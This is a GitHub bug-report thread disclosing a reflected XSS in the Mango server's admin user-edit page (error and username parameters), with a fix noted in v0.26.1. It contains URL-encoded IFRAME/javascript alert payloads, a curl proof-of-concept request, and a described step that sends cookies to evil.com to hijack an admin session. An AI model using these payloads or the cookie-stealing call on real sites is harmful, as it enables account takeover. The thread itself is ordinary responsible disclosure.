[Bug Report] Security issue XSS in error parameter

[bararchy]

Describe the bug
In the Error entrypoint at /admin/user/edit?error=error message there is a lack of proper string sanitation allowing for an XSS (Cross Site Scripting) attack.

While working on testing the https://github.com/NeuraLegion/sec_tester shard by integration to multiple projects I've found that there was a High severity issue in that parameter.

To Reproduce
Steps to reproduce the behavior:

1. Go to /admin/user/edit?error=error message
2. Change the error message to %3CIFRAME+onMouseOver%3Dalert%28298311%29+src%3D%22javascript%3Aalert%28298311%29%3B%22%3E%3C%2FIFRAME%3E
3. This will pop-up the alert message 298311
4. Example Screen:
   

Expected behavior
The alert shouldn't be raised and the user should either not be allowed to control the error message, or if this is needed then string sanitation to remove all non alphanumeric values should be added.

Docker (if you are running Mango in a Docker container)

• The standard file using latest docker.

Additional context
There were other Low severity issues found and I haven't really covered much of the application with the tests, It might be worth to make a bigger scope check

[hkalexling]

Oops that's bad! I will do a bug fix release soon. Thanks for catching this!

[bararchy]

@hkalexling thanks for tackling that quickly! 🎉
I'm broadening the scope of my tests, do you want additional findings as new issues or as comments here?

I would also suggest for the sake of users to publish a security advisory :)
https://docs.github.com/en/code-security/repository-security-advisories/creating-a-repository-security-advisory

[hkalexling]

Thanks! It would be great if you could update the issue for any additional XSS vulnerabilities and create new tickets for other security issues.

Oh, I didn't know it's a thing! I will look into it. By the way, I think the severity of this particular vulnerability is not high - the only way for it to work is for the attacker to craft the URL and trick the victim into opening it. Or maybe I am missing something?

[bararchy]

The attack is a client side attack but is definitely on the high severity side.

Using simple check out the new hidden manga bundled with mango! Just go to: yourdomain/path/with/evil/script

And make the script call a remote attacker server with evil.com?url=document.location&cookie=document.cookies

Because the attack builds on yourdomain it's very trustworthy and users usually ignore the usual signs for phishing (it's my site, it's safe).

Meanwhile attacker gets admin access by using the session cookie.

So in large yes, it's client side, but it's easy to weaponize and has high impact.

I hope my explanation makes sense :)

[hkalexling]

Yeah I agree. I didn't think about the psychological aspect of that, and it makes total sense. Thanks for your time in checking and explaining this, really appreciate it!

[bararchy]

@hkalexling Seems the username param is also vulnerable:

curl -i -H 'Referer:http://127.0.0.1:9000/admin/user' -H 'cookie:mango-sessid-9000=c7a43472238bd067d7aebe0cb405b4ce--fd270bcd2a710276437daad26aa97385e6a92eec' -H 'User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept-Encoding:identity' -H 'Content-Length:0' 'http://127.0.0.1:9000/admin/user/edit?username=--%3E%3CIFRAME+onMouseOver%3Dalert%28252919%29+src%3D%22javascript%3Aalert%28252919%29%3B%22%3E%3C%2FIFRAME%3E&admin=true'

url: http://127.0.0.1:9000/admin/user/edit?username=--%3E%3CIFRAME+onMouseOver%3Dalert%28252919%29+src%3D%22javascript%3Aalert%28252919%29%3B%22%3E%3C%2FIFRAME%3E&admin=true

POC:

[mango-assistant]

Hi there! The issue has been fixed in v0.26.1. Thanks for the bug report!